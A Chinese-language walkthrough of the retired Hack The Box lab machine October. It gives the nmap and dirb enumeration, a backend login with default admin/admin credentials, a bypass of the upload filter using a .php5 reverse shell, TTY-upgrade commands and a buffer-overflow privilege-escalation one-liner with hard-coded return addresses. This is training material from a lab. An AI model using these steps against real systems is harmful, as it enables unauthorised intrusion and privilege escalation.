本篇文章僅用於技術交流學習和研究的目的，嚴禁使用文章中的技術用於非法目的和破壞，否則造成一切後果與發表本文章的作者無關

靶機是作者購買VIP使用退役靶機操作，顯示IP地址為10.10.10.16

nmap -sV -sC -p- -T5 -oN october.nmap 10.10.10.16

nmap掃描結果

只有兩個埠，訪問web應用看看

點了上面的功能按鈕，沒發現什麼有價值的資訊，使用dirb命令跑下目錄

試了下上面發現的目錄都測試了下，發現uri地址backend訪問是個登入介面，並且上面顯示是october cms程式，谷歌搜尋了下，是預設賬號密碼admin/admin能夠正常登入進去

進去之後上面的功能都點選了一把，發現http://10.10.10.16/backend/cms/media 可以直接上傳檔案，經過測試我直接上傳php字尾檔案顯示失敗，然後看到目標靶機的上已經有了一個php5字尾的檔案

那麼直接上傳個php5格式的反彈shell程式碼，結果成功了， 併成功反彈shell

這次我就是使用非python環境升級成tty-shell ，具體步驟如下

非 python環境tty-shell
script /dev/null -c bash
在鍵盤上按住Ctrl+Z
stty raw -echo
fg
reset
會讓你輸入型別，輸入：xterm
echo $TERM（檢視型別，可以不執行）
export TERM=xterm
export SHELL=bash
stty rows 54 columns 104  (得到這個是在本地kali執行 stty -a所獲得)

最終獲得了tty-shell，使用提權列舉指令碼https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh 獲取到本靶機是需要通過緩衝區溢位的方式進行提權，具體提權程式碼如下：

while true; do ./ovrflw $(python -c 'print "A"*112 + "\x10\x13\x5e\xb7\x60\x42\x5d\xb7\xac\x3b\x70\xb7"');done